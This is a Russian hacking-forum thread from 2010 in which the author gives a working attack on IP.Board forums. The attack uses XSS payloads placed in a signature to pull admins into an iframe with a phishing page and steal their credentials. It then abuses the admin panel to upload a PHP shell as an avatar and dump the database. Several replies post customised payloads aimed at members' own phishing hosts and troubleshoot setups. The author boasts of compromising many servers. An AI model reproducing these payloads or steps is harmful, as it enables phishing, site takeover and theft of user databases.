Взлом БД через форум с xss

~~m0nk~~ · 03.06.2010, 09:38

Это оригинальная тема, другие темы выложеные на других сайтах тупой копипаст

Данный баг долго лежал в подполье, решил выложить и выслушать ваши вопросы связанные с данным багам.
Прежде чем спрашивать прочитайте все до конца.

Для начала давайте разберемся что нам это даст?
1)Стать админом а больше ничего и ненадо)

Вообщем я нашёл способ взлома сайта а там и бд, через форум ipb с применением xss.

Что такое xss?

Код:

XSS (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты. Специфика подобных атак заключается в том, что вместо непосредственной атаки сервера они используют уязвимый сервер в качестве средства атаки на клиента.
Иногда для термина используют сокращение «CSS», но чтобы не было путаницы с каскадными таблицами стилей, используют сокращение «XSS».Сейчас XSS составляют около 15 % всех обнаруженных уязвимостей[1]. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора). На популярном сайте скрипт может устроить DoS-атакy.

Работает везде где имееться тег acronym в ipb

Пример популярных серверов: [Ссылки могут видеть только зарегистрированные пользователи. ] (уже не актуально)

XSS работал бы и на шоках но там слишком длиные сообщения запрещены(в подписи) а в сообщение эти теги отключены.

Создаем фейк.

Как Создать?Жми сюда!
Фейк мы приготовили. Пример: [Ссылки могут видеть только зарегистрированные пользователи. ]
Теперь нам нужно приготовть xss.

Код xss выглядит таким образом:
1) Для ie & firefox

Код:

[acronym=test1[acronym=test2 onmouseover= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]_]___________________________________________________________________________[/acronym]_[/acronym][/size][/color]

2) Для opera:

Код:

[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://mail.ru\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

Пример с оперой [Ссылки могут видеть только зарегистрированные пользователи. ]

Вместо [Ссылки могут видеть только зарегистрированные пользователи. ] вам нужно вставить свою ссылку на фейк. И у вас должно получиться что то вроде этого:

Код:

[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://l2fan-day.ru.freehostia.com/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

Чтобы небыло видно лучше всего скрыть цветом.

Код мы приготовили теперь нужно его вставить в подпись, для этого идем в кабинет, переходим в подпись и вставляем код.

Теперь нужно поймать админа, для этого пишем ему в ЛС что либо про донат и т.д. и т.п.

Код работает таким образом. Когда админ переходит на ваше лс (личное сообщение) открывается ваш фейк с адресом форума (Оо). То есть админ не впалит вас что это фейк а подумает что нить про куки и т.п.
Когда же админ зайдет снова в ваше ЛС фейк больше НЕ ОТКРОЕТЬСЯ ^^, при переходе на фейк он получит куки в виде ibp_my=1234 и пока есть этот кук переадресовывать на фейк не будет. Но как же сделать чтобы куки стерались через 24 часа?

setTime(getTime()+30*24*60*60*1000)
Красным выделено количество дней, в течение которых кука будет храниться в браузере юзера.(Вам нужно изменить это в коде)

Вот админ прочитал наш лс мы получили его пасс. Что делать дальше?А дальше мы идем в админку [Ссылки могут видеть только зарегистрированные пользователи. ]
Есть несколько способов залить шелл:
1) Через аватар
2) Через sql
3) Через настройки форума

Первый наиболее легки поэтому я вам про него расскажу.
В админке идем Форумы->Прикрепляемые файлы->Типы файлов
жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да. Топаем в свой профиль:

[Ссылки могут видеть только зарегистрированные пользователи. ]

грузим аву-шелл с расширением php3, смотрим адрес вашего аватара переходим по нему и получаем шелл.

Далее залазим в самый корень и ищем config файл с логин и пассом от мускула, ну а дальше подключаемся сливаем бд и т.д.

Таким образом мной было взломано очень много серверов, первой жертвой как вы уже догадались был сервер l2fan-day.ru.

Хочешь знать как фиксануть данную багу? ЖМИ СЮДА!

Все вопросы только в эту тему, именно для этого я её создал! В icq не писать, всё равно не отвечу.

Удачи!

Уже появились первые вопросы.

FAQ:

Вопрос: Так получается админ еще должен в фейк ввести логин пасс свой?Так он не глупый не введет.
Ответ: Адрес будет [Ссылки могут видеть только зарегистрированные пользователи. ] форум.com/index.php?act=Msg&CODE=01 а страница фейковая, т.е. адрес не поменяется

Вопрос: Так значит название домена не повлияет?
Ответ: Не повлияет

Вопрос: чтобы и на ИЕ и на Оперу фейк переадресовывал можно в подписи оба кода вставить?
Ответ: Да
Вопрос: Почему у меня в фейке не отображаються картинки?
Ответ: Прочитай статью занова и внимательно!

Вопрос: Где смотреть пароли? or вопрос,а где будет пароль админа?
Ответ: В файле txt (pass.txt и т.д. и т.п.)

Вопрос: Какой хостинг выбрал ты?
Ответ: [Ссылки могут видеть только зарегистрированные пользователи. ] но для этого вам придеться и зарегать почту на fromru.com или gmail.com, ещё хостинги: 1gb.ru, hum.ru

Вопрос: Как поменять сообщение под цвет форума?
Ответ: Используй bb код [*COLOR="цвет"][/COLOR*] (без *)

Вопрос: Создал фейк но при вводе логина и пасса выходит вот такая ошибка:

Код:

Warning: Unknown: open_basedir restriction in effect. File(/home/vov/l/2/t/l2toy/public_html/login.php) is not within the allowed path(s): (/nonexistent) in Unknown on line 0 Warning: Unknown: failed to open stream: Operation not permitted in Unknown on line 0 Fatal error: Unknown: Failed opening required '/home/vov/l/2/t/l2toy/public_html/login.php' (include_path='.:/usr/local/share/pear') in Unknown on line 0

Ответ: Меняй хостинг либо ставь права чмод 777

Вопрос: Где найти такие форумы?
Ответ: [Ссылки могут видеть только зарегистрированные пользователи. ]

Вопрос: Программа создала фейк но там не понятна кодировка, всякие квадратики и т.д
Ответ:В программе, внизу где 'Дополнительная замена строк'
Введите в поле 'C' => charset=utf-8
Введите в поле 'На' => charset=windows-1251

Вопрос:Как можно небольшие белые полоски сверху и сбоку убрать
Ответ:В коде вместо x20width=100%\x20height=100% вставь x20width=1024\x20height=768

Вопрос:как сделать так, чтобы прокрутка (скрол) была только вертикальная?
Ответ:никак

Вопрос: Какой шелл лучше всего юзать?
Ответ: Я вам предлагаю [Ссылки могут видеть только зарегистрированные пользователи. ] после залития попросит пароль введите root

Вопрос: ты сможешь ламануть для меня ?
Ответ нет это меня до смерти надоело)

На таких скинах как [Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ] [Ссылки могут видеть только зарегистрированные пользователи. ] asterios и т.д. непашет

ПРОШУ ВНИМАНИЯ!
В коде где x3C****** поменяйте на x3Cifr*ame (без*) везде , т.к. форум жрет этот кусок кода!

Видео по созданию фейка.
[Ссылки могут видеть только зарегистрированные пользователи. ]
Пасс: zhyk.ru Спасибо пиквику)

P.S. Отдельное спасибо LeverOne

При копировании указывать источник обязательно! ( Люди не будьте засранцами

)
©m0nk

~~m0nk~~ · 03.06.2010, 09:52

[Ссылки могут видеть только зарегистрированные пользователи. ]

На l2top.ru ты найдешь кучу таких форумов

BuT9H · 03.06.2010, 11:19

создал фейк ввожу туда логин пасс потом не переадресовывает а выходит ошибка и данные не записываются в текстовик на хостинге...что делать?

xRedBullkax · 03.06.2010, 12:17

как проверить что фикса нету?
я скрипт вставил,подпись изменил,и пишет типо ваша текущая подпись '>

~~Rea1~~ · 03.06.2010, 12:18

Сори за нубство)

Код:

[acronym=[acronym= style=background:url('//') onerror= 

lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.coo

kie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://finalarena.com.wallst.ru/

/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); 

]][/acronym][/acronym]

правельная подпись или я чёт нето написал?)

~~m0nk~~ · 03.06.2010, 12:36

Цитата:

Сообщение от xRedBullkax


	как проверить что фикса нету? я скрипт вставил,подпись изменил,и пишет типо ваша текущая подпись '>

так и должно быть, скрой это под цвет форума

Цитата:

Сообщение от Rea1

Сори за нубство)

Код:

[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.coo kie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://finalarena.com.wallst.ru/ /\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

правельная подпись или я чёт нето написал?)

1) ты зачем ****** поменял на * ?
2) [Ссылки могут видеть только зарегистрированные пользователи. ] нет такого сайта
3) Будет вот так:

Код:

[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://finalarena.com.wallst.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

Добавлено через 17 минут
ПРОШУ ВНИМАНИЯ!
В коде где x3C****** поменяйте на x3Cifr*ame (без*) , т.к. форум жрет этот кусок кода!

fireridlle · 03.06.2010, 14:16

программа сделал фейк не с тем оформлением.
вот оригинал [Ссылки могут видеть только зарегистрированные пользователи. ]
вот фейк [Ссылки могут видеть только зарегистрированные пользователи. ]

**cavern** · 03.06.2010, 17:01

вот шелл wso2 [Ссылки могут видеть только зарегистрированные пользователи. ]
на форумах такого типа у кого-нибудь работает? [Ссылки могут видеть только зарегистрированные пользователи. ]

~~Sorceres~~ · 03.06.2010, 18:02

Возникает такая трабла при создании фейка..
Атрибуты 777
Страница ввода логина работает,а когда жмёшь войти такая вот ошибка(1 скрин)

2 скрин что у меня в login.php

IceMix · 03.06.2010, 18:06

Ребят поскажите как зделать права 777 ???

Хостинг wallst.ru

~~Rea1~~ · 03.06.2010, 18:07

Выдели пожалуйста строку где ставить пробел...

fireridlle · 03.06.2010, 18:21

сайт la2real.net/forum
в подписе пишу

Код:

[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime()+30*24*60*60*1000);document.cookie=\x22ipb_my=1234;\x20expires=\x22+valid_until.toGMTString();document.write(\x22\x3C******\x20src=http://freya.wallst.ru/\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

ошибка
[Ссылки могут видеть только зарегистрированные пользователи. ]

~~m0nk~~ · 03.06.2010, 18:42

Цитата:

Сообщение от Sorceres


	Возникает такая трабла при создании фейка.. Атрибуты 777 Страница ввода логина работает,а когда жмёшь войти такая вот ошибка(1 скрин) 2 скрин что у меня в login.php

меняй хостинг, валст неподходит

fireridlle · 03.06.2010, 18:43

а можно сделать чтоб переход побыстрей проходил. а то я сначало смотрю свой профиль и где то через секунд 5 меня перенаправляет на мой фейк

Добавлено через 1 минуту

Цитата:

Сообщение от m0nk


	меняй хостинг, валст неподходит

подходит
вот у меня стоит [Ссылки могут видеть только зарегистрированные пользователи. ]

fireridlle · 03.06.2010, 19:45

поставь права 777 на файл pass.txt(или как он у тебя называется).
дай сылку на фейк. лог и пас от админки. посмотрю что у тебя там

Взлом БД через форум с xss

Базы серверов и брут